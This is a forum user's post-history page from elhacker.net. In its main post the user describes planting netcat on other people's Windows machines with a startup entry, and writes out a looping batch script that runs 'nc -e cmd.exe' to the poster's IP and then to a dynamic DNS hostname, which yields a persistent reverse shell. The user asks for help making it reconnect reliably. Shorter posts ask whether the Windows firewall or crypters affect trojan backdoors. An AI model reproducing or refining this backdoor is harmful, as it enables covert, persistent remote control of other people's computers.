elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 [11]
101  Foros Generales / Dudas Generales / Problema con NO-IP y Netcat en: 9 Agosto 2015, 02:49 am
Hola gente que tal! Les cuento mi problema! Un par de personas me dieron acceso a sus máquinas para que las supervise, las mantenga limpias, y las administre. Instale el Netcat y lo dejo en "habla" digamos a un puerto mio y mi direccion de IP, ejemplo del comando:

nc -e cmd.exe 192.188.1.231 24444

Tambien dentro del directorio run deje una entrada para que el netcat se inicie al arrancar la computadora... Uno de los problemas (que solucione) es que el comando se ejecutaba una sola vez y si yo no dejaba mi netcat en escucha, ya no habia forma de volver a conectarme, entonces programe un simple algoritmo de polling con batch para que el comando se ejecutara siempre que la pc estuviera prendida. Quedo algo asi:

Set/a var=0
:while
nc -e cmd.exe 192.188.1.231 24444
if %var% == 0 (goto while)
pause

Ahi funcionaba perfecto. Si no estaba en escucha, el programa itera interminablemente hasta que yo estuviera en escucha y si me desconecto continuaba iterando y podía volver a conectarme. El problema es que mi IP pública es dinámica asi que tuve que reemplazar mi ip por el dominio DNS que me dio NO-IP, quedando algo asi:

Set/a var=0
:while
nc -e cmd.exe randon.ddns.net 24444
if %var% == 0 (goto while)
pause

Mi problema actual es el siguiente: Si yo no tengo abierto el cliente DUC, en los remotos se entra una sola vez al comando del netcat y se muere ahi, no continua iterando... Enonces si despues abro el DUC, no tengo forma de acceder... Si tengo abierto el cliente antes de que se ejecute el batch, funciona a la perfección: si no estoy a la escucha con netcat, iteran, y si estoy a la escucha acceden, y cuando me desconecto siguen iterando... Una solución sería dejar mi PC prendida las 24 horas con el cliente DUC abierto, lo cual no me agrada... Lo que quería hacer, es un algoritmo que verifique si me pude conectar, si hay conexion, o que se de cuenta si mi cliente este abierto o no, y en caso de no estarlo que salga del netcat y le seda nuevamente el control al batch para que siga iterando como tendría que ser...

Espero que me ayuden a implementar éste algoritmo, que me den alguna idea... No me hagan usar otra cosa que no sea Netcat, xq estoy encariñado con éste :p jaja. Y se que tiene que existir una solucion para conseguir lo que busco. Espero que me hayan entendido y sepan como ayudarme! Desde ya, muchisimas gracias! :D
102  Seguridad Informática / Análisis y Diseño de Malware / Re: Duda sobre troyanos y firewall de Windows en: 4 Agosto 2015, 11:45 am
Genial! Excelente respuesta, te agradezco... Y una última pregunta, si yo tengo configurado el firewall con cierto nivel de restricción, el hacker puede esquivar las reglas del firewall de alguna forma?
103  Seguridad Informática / Análisis y Diseño de Malware / Duda sobre troyanos y firewall de Windows en: 4 Agosto 2015, 10:12 am
Hola gente que tal? Tengo una duda. Se que los troyanos, virus, y demas malware pueden venir codificados con crypters para esquivar a los antivirus pero no entiendo bien el papel que toma el firewall de windows, su funcionamiento... Por ejemplo alguna vez habré descargado malware y me salio una ventana de firewall de windows diciendome que había bloqueado  ciertas características de la aplicación y venía con dos opciones: una para habilitarla en la red publica y otra para solo habilitarla en la privada... Mis dudas concretas serían: si yo (victima) hubiera seleccionado la opcion de habilitarla solo en redes privadas y el hacker a través de un backdoor está tratando de acceder a una consola inversa a traves de internet, entonces no tendría acceso? Y mi otra duda es si un crypter ademas de esquivar a los antivirus, esquivan al firewalll... Por ejemplo un troyano bien cifrado no me haría saltar la ventana que les dije? Gracias desde ya por su tiempo!
Páginas: 1 2 3 4 5 6 7 8 9 10 [11]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines